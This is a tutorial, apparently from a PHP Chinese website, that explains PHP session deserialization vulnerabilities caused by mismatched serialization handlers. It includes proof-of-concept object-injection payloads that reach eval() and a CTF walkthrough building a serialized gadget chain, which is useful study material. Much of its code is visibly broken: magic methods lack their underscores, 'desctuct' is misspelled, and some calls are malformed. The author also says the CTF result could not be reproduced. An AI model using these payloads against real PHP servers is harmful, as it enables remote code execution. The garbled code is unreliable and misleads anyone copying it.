This time I will bring you a detailed explanation of the use of PHP's SESSION deserialization. What are the precautions for using PHP's SESSION deserialization? . Here are actual cases, let's take a look.
There are three configuration items in php.ini:
session.save_path="" --Set the session storage pathsession.save_handler=" " --Set a user-defined storage function. If you want to use something other than PHP's built-in session storage mechanism, you can use this function (database, etc.)
session.auto_start boolen --Specify whether the session module starts a session at the beginning of the request Session, the default is 0 and does not start
session.serialize_handler string --Define the name of the processor used for serialization/deserialization. The options above using php
by default are options related to Session storage and sequence storage in PHP.
In the installation using the xampp component, the above configuration items are set as follows:
session.save_handler=files Indicates that the session is stored in the form of files
session.auto_start=0 Indicates that the session is not started by default
session.serialize_handler=php Indicates that the default serialization engine of the session uses php Serialize engine
In the above configuration, session.serialize_handler is used to set the sequence engine of the session. In addition to the default PHP engine, there are other engines. The storage methods of sessions corresponding to different engines are different. same.
php: The storage method is that the vertical bar of the key name is passed through the serialize() function Serialized value
php_serialize(php>5.5.4): The storage method is that the value serialized by the serialize() function
The PHP engine is used by default in PHP. If you want to modify it to another engine , just add the code ini_set('session.serialize_handler', 'The engine that needs to be set');. The sample code is as follows:
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); // do something
The stored file is named after sess_sessionid, and the content of the file is the content after the sequence of the session value.
Assuming that our environment is xampp, the default configuration is as above.
Under the default configuration:
<?php session_start() $_SESSION['name'] = 'spoock'; var_dump(); ?>
Under the php_serialize engine:
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION['name'] = 'spoock'; var_dump(); ?>
<?php ini_set('session.serialize_handler', 'php_binary'); session_start(); $_SESSION['name'] = 'spoock'; var_dump(); ?>
Simple use of serialization
test.php<?php class syclover{ var $func=""; function construct() { $this->func = "phpinfo()"; } function wakeup(){ eval($this->func); } } unserialize($_GET['a']); ?>
object(syclover)[1] public 'func' => string 'echo "spoock";' (length=14)
This is a demonstration of a simple serialization vulnerability
Serialization hazards in PHP Session
PHP中的Session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的。
如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法。例如:
$_SESSION['ryat'] = '|O:11:"PeopleClass":0:{}';
上述的$_SESSION的数据使用php_serialize,那么最后的存储的内容就是
a:1:{s:6:"spoock";s:24:"|O:11:"PeopleClass":0:{}";}。
但是我们在进行读取的时候,选择的是php,那么最后读取的内容是:
array (size=1) 'a:1:{s:6:"spoock";s:24:"' => object(PHP_Incomplete_Class)[1] public 'PHP_Incomplete_Class_Name' => string 'PeopleClass' (length=11)
这是因为当使用php引擎的时候,php引擎会以|作为作为key和value的分隔符,那么就会将a:1:{s:6:"spoock";s:24:"作为SESSION的key,将O:11:"PeopleClass":0:{}作为value,然后进行反序列化,最后就会得到PeopleClas这个类。
这种由于序列话化和反序列化所使用的不一样的引擎就是造成PHP Session序列话漏洞的原因。
实际利用
存在s1.php和us2.php,2个文件所使用的SESSION的引擎不一样,就形成了一个漏洞、
s1.php,使用php_serialize来处理session
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["spoock"]=$_GET["a"];
us2.php,使用php来处理session
ini_set('session.serialize_handler', 'php'); session_start(); class lemon { var $hi; function construct(){ $this->hi = 'phpinfo();'; } function destruct() { eval($this->hi); } }
当访问s1.php时,提交如下的数据:
localhost/s1.php?a=|O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}
此时传入的数据会按照php_serialize来进行序列化。
此时访问us2.php时,页面输出,spoock成功执行了我们构造的函数。因为在访问us2.php时,程序会按照php来反序列化SESSION中的数据,此时就会反序列化伪造的数据,就会实例化lemon对象,最后就会执行析构函数中的eval()方法。
CTF
在安恒杯中的一道题目就考察了这个知识点。题目中的关键代码如下:
class.php <?php highlight_string(file_get_contents(basename($_SERVER['PHP_SELF'])));//show_source(FILE); class foo1{ public $varr; function construct(){ $this->varr = "index.php"; } function destruct(){ if(file_exists($this->varr)){ echo "<br>文件".$this->varr."存在<br>"; } echo "<br>这是foo1的析构函数<br>"; }} class foo2{ public $varr; public $obj; function construct(){ $this->varr = '1234567890'; $this->obj = null; } function toString(){ $this->obj->execute(); return $this->varr; } function desctuct(){ echo "<br>这是foo2的析构函数<br>"; }} class foo3{ public $varr; function execute(){ eval($this->varr); } function desctuct(){ echo "<br>这是foo3的析构函数<br>"; }} ?>index.php <?php ini_set('session.serialize_handler', 'php'); require("./class.php"); session_start(); $obj = new foo1(); $obj->varr = "phpinfo.php"; ?>
通过代码发现,我们最终是要通过foo3中的execute来执行我们自定义的函数。
那么我们首先在本地搭建环境,构造我们需要执行的自定义的函数。如下:
myindex.php
<?phpclass foo3{ public $varr='echo "spoock";'; function execute(){ eval($this->varr); }}class foo2{ public $varr; public $obj; function construct(){ $this->varr = '1234567890'; $this->obj = new foo3(); } function toString(){ $this->obj->execute(); return $this->varr; }} class foo1{ public $varr; function construct(){ $this->varr = new foo2(); }} $obj = new foo1();print_r(serialize($obj));?>
在foo1中的构造函数中定义$varr的值为foo2的实例,在foo2中定义$obj为foo3的实例,在foo3中定义$varr的值为echo "spoock"。最终得到的序列话的值是
O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:14:"echo "spoock";";}}}
这样当上面的序列话的值写入到服务器端,然后再访问服务器的index.php,最终就会执行我们预先定义的echo "spoock";的方法了。
写入的方式主要是利用PHP中Session Upload Progress来进行设置,具体为,在上传文件时,如果POST一个名为PHP_SESSION_UPLOAD_PROGRESS的变量,就可以将filename的值赋值到session中
最后就会将文件名写入到session中,具体的实现细节可以参考PHP手册。
但是我在进行本地测试的时候,发现无法实现安恒这道题目所实现的效果,但是最终的原理是一样的。
总结
通过对PHP中的SESSION的分析,对PHP中的SESSION的实现原理有了更加深刻的认识。这个PHP的SESSION问题也是一个很好的问题。上述的这篇文章不仅使大家PHP中的SESSION的序列化漏洞有一个认识,也有助于程序员加强在PHP中的SESSION机制的理解。
相信看了本文案例你已经掌握了方法,更多精彩请关注php中文网其它相关文章!
推荐阅读:
The above is the detailed content of Detailed explanation of PHP's SESSION deserialization usage. For more information, please follow other related articles on the PHP Chinese website!